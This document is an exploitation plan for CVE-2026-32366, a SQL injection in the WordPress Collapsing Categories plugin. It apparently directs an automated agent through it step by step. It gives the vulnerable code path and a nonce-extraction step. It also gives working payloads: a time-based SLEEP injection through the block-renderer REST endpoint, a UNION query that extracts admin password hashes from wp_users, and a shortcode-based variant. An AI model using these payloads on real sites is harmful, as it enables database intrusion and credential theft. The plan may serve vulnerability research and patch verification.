Exploitation Research Plan - CVE-2026-32366

1. Vulnerability Summary

The Collapsing Categories plugin (version <= 3.0.9) is vulnerable to an authenticated SQL injection. The vulnerability exists because the plugin fails to properly sanitize and parameterize user-supplied attributes passed to the get_collapscat_fromdb() function. Specifically, parameters like catSort, postSort, catSortOrder, and postSortOrder are interpolated directly into SQL queries without using $wpdb->prepare(). Since these parameters are accessible via Gutenberg block attributes and shortcodes, an attacker with Contributor+ privileges can inject arbitrary SQL commands.

2. Attack Vector Analysis

• Endpoint: /wp-json/wp/v2/block-renderer/collapsing-categories/collapscat (Gutenberg Block Renderer)
• Vulnerable Parameters: attributes[catSort], attributes[postSort], attributes[catSortOrder], attributes[postSortOrder]
• Authentication Required: Contributor level or higher (must be able to access the block editor or edit posts).
• Preconditions: The plugin must be active. The block name is inferred as collapsing-categories/collapscat based on the class CollapsCat and function render_callback.

3. Code Flow

1. Entry Point: A Contributor+ user accesses the Gutenberg editor or calls the Block Renderer REST API.
2. Dispatcher: The render_callback($attributes) function in collapscat.php (Line 59) receives the user-controlled attributes.
3. Intermediate: render_callback calls collapsCat($instance, false, true) (Line 73), where $instance contains the $attributes.
4. Data Retrieval: collapsCat calls get_collapscat_fromdb($args) in collapscatlist.php (Line 217 in collapscat.php trace).
5. Sink: Inside get_collapscat_fromdb(), the $args['catSort'] (or postSort) values are appended to an ORDER BY clause in a raw SQL query using $wpdb->get_results() without preparation.

4. Nonce Acquisition Strategy

To exploit the block renderer via the REST API, a wp_rest nonce is required.

1. Login: Authenticate as a Contributor user.
2. Navigation: Navigate to the WordPress dashboard (/wp-admin/index.php).
3. Extraction: Use browser_eval to extract the REST nonce from the wpApiSettings object available in the admin context.
   • JavaScript: window.wpApiSettings.nonce

5. Exploitation Strategy

The exploit will use a time-based blind SQL injection in the catSort attribute.

Step 1: Authentication and Nonce Extraction

• Authenticate the agent as a Contributor.
• Navigate to /wp-admin/ and extract the wp_rest nonce.

Step 2: Proof of Concept (Time-based)

• Method: GET
• URL: /wp-json/wp/v2/block-renderer/collapsing-categories/collapscat
• Query Parameters:
  • context: edit
  • attributes[blockId]: 1
  • attributes[catSort]: cat_ID,(SELECT(0)FROM(SELECT(SLEEP(5)))a)
  • _wpnonce: [EXTRACTED_NONCE]
• Expected Response: The request should take approximately 5 seconds longer than a baseline request.

Step 3: Data Extraction (UNION-based)

If the query results are reflected in the category names:

• Payload: attributes[catSort] = (SELECT 1 FROM (SELECT 1)a) UNION SELECT 1,2,3,user_pass,5,6 FROM wp_users WHERE ID=1-- (Adjust column count as needed).

6. Test Data Setup

1. User: Create a user with the contributor role.
2. Content: Ensure at least one category exists in WordPress so the query returns results.
   • wp term create category "Test Category" --slug=test-cat

7. Expected Results

• Success Indicator: A successful time-based attack will show a distinct latency of 5+ seconds when the SLEEP(5) payload is sent.
• Response Payload: The block renderer returns a JSON object containing an rendered key with the HTML output of the block. If a UNION attack is successful, database content will appear within the category list items (<li class='collapsing-categories'>...</li>).

8. Verification Steps

1. Check SQL execution: Use wp db query "SHOW PROCESSLIST" via CLI during the SLEEP request to confirm the sleeping query.
2. Log verification: Check wp-content/debug.log if WP_DEBUG is enabled to see the malformed query error if the payload requires adjustment.

9. Alternative Approaches

• Shortcode Injection: If the REST API route is restricted, a Contributor can create a post with a shortcode:
  • wp post create --post_type=post --post_status=publish --post_content='[collapsCat catSort="cat_ID, (SELECT 1 FROM (SELECT(SLEEP(5)))a)"]' --post_author=[CONTRIBUTOR_ID]
  • Then, use http_request to view the post frontend and measure response time.
• Post Sort Injection: If catSort is filtered, try the postSort attribute, which likely flows into a similar query for posts within get_collapscat_fromdb.